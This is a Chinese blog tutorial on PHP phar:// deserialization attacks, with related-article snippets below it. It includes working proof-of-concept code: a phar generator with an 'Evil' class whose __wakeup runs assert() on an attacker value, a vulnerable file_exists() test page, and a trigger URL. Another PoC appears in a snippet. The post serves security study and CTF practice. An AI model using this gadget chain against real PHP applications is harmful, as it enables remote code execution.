php和phar后缀,使用phar实现php反序列化

最新推荐文章于 2023-01-27 23:46:46 发布
最新推荐文章于 2023-01-27 23:46:46 发布
阅读量171 收藏
点赞数
文章标签: php和phar后缀

前言

一般说到反序列化漏洞,第一反应都是unserialize()函数。然而安全研究员Sam Thomas分享了议题It’s a PHP unserialization vulnerability Jim, but not as we know it,利用phar伪协议会将用户自定义的meta-data序列化的形式存储这一特性,扩展php反序列化的攻击面。一般来说,文件操作都是可以触发phar反序列化的。

可以上传Phar文件

有可以利用的魔术方法

文件操作函数的参数可控

攻击原理

phar结构

翻阅手册可以知道,phar由四个部分组成,分别是stub、manifest describing the contents、 the file contents、 [optional] a signature for verifying Phar integrity (phar file format only),以下是对详细的介绍:

a stub

标识作用,格式为xxx<?php xxx; __HALT_COMPILER();?>,前面任意,但是一定要以__HALT_COMPILER();?>结尾,否则php无法识别这是一个phar。

a manifest describing the contents

phar文件实质上是一种压缩文件,其中压缩信息、权限等都在这一部分里。当然,我们所需的攻击利用点meta-data序列化信息也在这一部分中。具体结构入图2-1所示:

0cfc98f72e52

图2-1 phar文件详细描述信息

the file contents

被压缩的文件。

[optional] a signature for verifying Phar integrity (phar file format only)

签名,放在文件末尾。

测试

phar文件生成

根据文件结构我们来自己构建一个phar文件,php内置了一个Phar类。

注意:需要将php.ini中的phar.readonly设置成off。

# phar_gen.php

require_once('Evil.class.php');

$exception = new Evil('phpinfo()');

$phar = new Phar("vul.phar");

$phar->startBuffering();

$phar->addFromString("test.txt", "test");

$phar->setStub("<?php__HALT_COMPILER (); ?>");

$phar->setMetadata($exception);

$phar->stopBuffering();

?>

#eval.class.php

class Evil {

protected $val;

function __construct($val)

{

$this->val = $val;

}

function __wakeup() {

assert($this->val);

}

}

?>

执行之后生成一个vul.phar,用二进制编辑器打开,入图2-2所示:

0cfc98f72e52

图2-2 vul.phar

由图2-2可以发现,meta-data已经以序列化的形式存在phar文件中。

反序列化

对应,肯定存在着反序列化的操作。php文件系统中很大一部分的函数在通过phar://解析时,存在着对meta-data反序列化的操作。

测试环境如下:

#test.php

require_once('Evil.class.php');

if ( file_exists($_REQUEST['url']) ) {

echo 'success!';

} else {

echo 'error!';

}

?>

访问test.php, http://127.0.0.1/test.php?url=phar://vul.phar,得图2-3。

0cfc98f72e52

图2-3 执行成功

参考文章:

https://paper.seebug.org/680/

Nx·仙鹤无名
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
利用PHAR协议进行PHP反序列化攻击1
08-03
乎所有件操作函数都可触发 phar 反序列化题地址:[CISCN2019 华北赛区 Day1 Web1]Dropbox(链接:进题后,随意注册账号上传件,上传点
phpphar包的使用教程详解
10-17
本文将详细介绍如何在PHP使用`phar`包进行打包和解压操作。 首先,确保`phar`扩展在你的PHP环境中已经启用。你需要检查并修改`php.ini`配置文件,将`phar.readonly`设置为`Off`,这样你才能创建和修改`phar`文件...
一个phar://的漏洞
Xi4or0uji
10-17 5789
前段时间打了个护网杯,题目质量是真的高,肉鸡又菜了一整场,遇到了一个不太会的东西,复现了一波,记录下好吧。 这个鬼东西就是phar://的序列化的漏洞 介绍一下 phar://跟php://filter 、data://那些一样,都是流包装,可以将一组php文件进行打包,可以创建默认执行的stub stub 就是一个标志,格式xxx&lt;?php xxxxx; __HALT_COMPIL...
PHPphar反序列化
errorr0
03-14 1704
一个不需要unserialize也能反序列化的漏洞
phar的认识与使用
Leroi_Liu的博客
01-11 7660
对于Web应用的开发,如果你没用使用正确的工具,那开发过程可能会变得困难和痛苦。如果你之前开发过Java程序,我相信你肯定知道Jar文件(Jar是Java ARchive的缩写)。一个应用,包括所有的可执行、可访问的文件,都打包进了一个JAR文件里,使得部署过程十分简单。 PHAR (“Php ARchive”) 是PHP里类似于JAR的一种打包文件。如果你使用的是 PHP 5.3 或更高版本,...
phar://反序列化的利用【windows远程登录】
weixin_43821278的博客
07-16 529
前言 一、环境搭建 ​ 二、详细解释 1.phar反序列化 2.关键1 3.关键2 三、运行测试 四、总结 前言 看到CTF很多题都有关于phar://绕过文件上传配合反序列化利用的。但是实战中大概率不存在这么巧合的点。 在了解phar://时,看很多博客都是写入phpinfo()来执行的。我突发脑洞,既然可以执行phpinfo,那么可不可以写马获得shell呢? 由于对php对象不是很了解,踩了很多坑记录一下。 windows server 2008、php5.5.38、...
php归档格式:phar文件详解(创建、使用、解包还原提取)
热门推荐
云客的技术博客【云游天下 做客四方】
02-10 1万+
一个php应用程序往往是由多个文件构成的,如果能把他们集中为一个文件来分发和运行是很方便的,这样的列子有很多,比如在window操作系统上面的安装程序、一个jquery库等等,为了做到这点php采用了phar文档文件格式,这个概念源自java的jar,但是在设计时主要针对 PHP 的 Web 环境,与 JAR 归档不同的是Phar 归档可由 PHP 本身处理,因此不需要使用额外的工具来创建或使用
PHPphar包的使用教程
10-19
PHP中,`phar`(PHP Archive)是一种文件格式,允许开发者将多个PHP文件、资源和其他相关文件打包成单一的可执行文件,类似于Java的JAR文件。自PHP 5.3版本起,`phar`被引入,提供了一种高效且方便的方式来管理和...
PHP开发之归档格式phar文件概念与用法详解【创建,使用,解包还原提取】
10-18
- Composer、PHPUnit等流行PHP工具广泛使用phar格式进行分发和执行,因为它们简化了依赖管理和测试过程。 总结,phar文件PHP中一个强大的工具,它允许开发者将复杂的PHP应用程序打包为单一文件,便于分发和执行...
phar://go-pear.phar/index.php,php安装pear 错误:Warning: require_once(phar://go-pear.phar/index.php)...
weixin_39769187的博客
03-13 748
先上图:重点,重点,重点:重要事情说三遍下载 [Go-pear.phar][1] 的时候,不应该直接打开下载链接然后复制代码保存到文件中,而应该直接下载文件,比如“将链接另存为”。go-pear.phar乱码错误wamp64 上按照 pear。After you have downloaded and installed php, you have to manually execute the ...
php的pear编程: phpDocumentor的使用?
weixin_34082695的博客
03-29 129
pfc: php基础类库; pecl: php扩展公共库 pear: php extension and application repository. php的扩展和应用库 phar: ['fa:], 是已经编译好了的php二进制文件 gzip是gnu zip, 是linux下的zip压缩, 比winzip更保守。 压缩率和速度要慢点?? 但是在linux世界更通用。 tar + gzip = ...
php伪协议
weixin_60719780的博客
01-27 4467
PHP伪协议,也是php支持的协议和封装协议。file:// 访问本地文件系统php:// 访问各个输入/输出流data:// 数据zip:// 压缩流 不过有些伪协议需要allow_url_fopen和allow_url_include的支持。allow_url_fopen On/Off 允许或禁止打开URL文件allow_url_include On/Off 允许或禁止引用URL文件
[CISCN2019 华北赛区 Day1 Web1]Dropbox
沐目的博客
10-31 6788
知识点轰炸 1.1 open_basedir 在in_set这个函数中,可以设置php的一些配置,其中就包括open_basedir ,用来限制当前程序可以访问的目录。后来问了一下朱师傅,了解到:它是可以访问设置目录下的所有下级目录。 若"open_basedir = /dir/user", 那么目录 “/dir/user” 和 “/dir/other"都是可以访问的。所以如果要将访问限制在仅为指...
PHP安全 [伪协议]
weixin_45253622的博客
05-18 885
PHP安全 [伪协议] file://协议 ​http://协议 php://协议 zip:// bzip2:// zlib://协议 data://协议 phar:// 协议 首先在\DVWA-master\vulnerabilities\fi\目录下新建1.txt 2.txt 3.zip方便环境测试。 file://协议 file协议主要用于访问本地计算机中的文件,也就是用于访问本地文件系统,且不受allow_url_fopen与allow_url_include的影响..
php用于什么开发_PHP开发常识:什么是Phar?
weixin_39864373的博客
03-09 92
对于Web应用的开发,如果你没用使用正确的工具,那开发过程可能会变得困难和痛苦。如果你之前开发过Java程序,我相信你肯定知道Jar文件(Jar是Java ARchive的缩写)。一个应用,包括所有的可执行、可访问的文件,都打包进了一个JAR文件里,使得部署过程十分简单。PHAR (“Php ARchive”) 是PHP里类似于JAR的一种打包文件。如果你使用的是 PHP 5.3 或更高版本,那么...
[phar反序列化][NSSCTF]prize_p1
cosmoslin的博客
10-16 1208
prize_p1 考点:phar反序列化 <META http-equiv="Content-Type" content="text/html; charset=utf-8" /> <?php highlight_file(__FILE__); class getflag { function __destruct() { echo getenv("FLAG"); } } class A { public $config; function
php phar的创建与使用
Don't lost way
10-09 6252
phar类似java中的jar包,是一种压缩包。对于phar的创建与使用php手册中有phar扩展专门针对phar包进行操作,此处简单记录一下自己学习phar的一些心得。 1.配置 要想使用phar文件,必须将phar.readonly配置项配置为0或Off 2.
使用Phar来打包发布PHP程序
weixin_30733003的博客
08-18 305
简单来说,Phar就是把Java界的jar概念移植到了PHP界。 Phar可以将一组PHP文件进行打包,还可以创建默认执行的stub(或者叫做bootstrap loader),Phar可以选择是否进行压缩,可选gzip和bzip2格式。 下面举例说明如何创建和使用Phar: 假设我们的项目名称是user,包含三个文件: user/user.class.php ...
phar反序列化poc
最新发布
05-21
Phar反序列化漏洞是指攻击者利用PHP中的Phar文件解析器对不受信任数据进行反序列化攻击的一种安全漏洞。攻击者可以通过构造特定的Phar文件,触发解析器反序列化恶意代码,从而实现远程代码执行。 一个简单的Phar反序列化POC如下: ``` <?php class Example { public $command; } $phar = new Phar('phar.phar'); $phar->startBuffering(); $phar->setStub('<?php __HALT_COMPILER(); ?>'); $example = new Example(); $example->command = 'echo "Hello World";'; $phar->setMetadata($example); $phar->stopBuffering(); include 'phar://phar.phar/test.txt'; ?> ``` 上述POC中,攻击者创建了一个含有恶意代码的Phar文件,并将其反序列化到`$example`变量中,最后通过`include`语句触发远程代码执行。 相关问题: 1. 什么是Phar文件? 2. 什么是反序列化漏洞? 3. 如何防范Phar反序列化漏洞?

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值